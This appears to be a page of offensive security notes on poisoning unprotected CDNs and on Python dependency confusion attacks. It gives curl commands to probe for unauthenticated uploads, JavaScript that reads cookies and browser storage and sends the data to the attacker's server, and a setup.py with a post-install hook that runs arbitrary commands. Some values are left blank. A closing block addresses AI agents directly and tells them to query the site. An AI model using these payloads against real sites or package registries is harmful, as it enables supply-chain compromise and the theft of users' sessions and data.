# Dependency Injection ## Unprotected CDNs If the web application uses a third party server to retrieve resources such as scripts it is possible to attack the CDN and inject malicious code that is then executed in the page. Identify the CDN server by reviewing the requests sent by the page. This can be done easily in the Network tab of the browser's development tool. ### Verify server vulnerability Use the following requests to verify if the CDN supports unauthenticated writing via PUT or POST methods #### Options request ``` curl -i -X OPTIONS curl -i --request-target "*" -X OPTIONS ``` #### test unrestricted file upload ``` #PUT curl -X PUT /test.js -d "test" #POST curl -X POST -d @ curl -X POST -F @ #as form encoded curl -X POST --data-binary @ #use this if file is corrupted ``` ### Code injection Start local server ``` python -m http.server python -m SimpleHttpServer ``` Useful functions to extract data ``` document.cookie; document.getElementById('').value; JSON.stringify(localStorage); JSON.stringify(sessionStorage); ``` Payload to send data to our server ``` var req = new XMLHttpRequest(); var data = ; var data_encoded = btoa(unescape(encodeURIComponent(data))); req.open('GET',':/data:'+data_encoded,true); red.send(); ``` PUT request to replace resource with one containing our payload ``` curl -T http:/// ``` ## Dependency confusion This vulnerability arises when an application uses an internal package that is managed by a private repository. If we can upload our own package to the repository, during build time the python package manager will find duplicate packages and will pick the one with the latest version (this is why we upload a package with v9000 as version). This allows us to inject malicious code in the installer that will be executed by the package manager after retrieving our malicious package. ### Package structure Create standard python package structure ``` package = '' && \ mkdir "$package" && \ touch "${package}/__init__.py" && \ echo -e '#!/usr/bin/python3\ndef main():\n\tpass\n\nif __name__=="__main__":\n\tmain()' > "${package}/main.py" && \ touch "${package}/setup.py" ``` Configure setup.py ``` from setuptools import find_packages from setuptools import setup from setuptools.command.install import install import os import sys PACKAGE_NAME = '' VERSION = 'v9000.9.9' URL = 'http://github.com/{}'.format(PACKAGE_NAME) class PostInstallCommand(install): def run(self): install.run(self) os.system('') setup( name=PACKAGE_NAME, url=URL, download_url='{}/archive/{}.tar.gz'.format(URL,VERSION), author='John Doe', author_email='real@email.com', version=VERSION, packages=find_packages(), include_package_data=True, license='MIT', description='test package', cmdclass={ 'install': PostInstallCommand }, ) ``` ### Compile and upload the package Generate package and upload ``` python3 setup.py sdist twine upload dist/-9000.9.9.tar.gz --repository-url ``` Download package for testing or to transfer the payload on another compromised machine ``` pip3 install --trusted-host --index-url --verbose ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://security-notes.gitbook.io/security-notes/web-attacks/dependency-injection.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.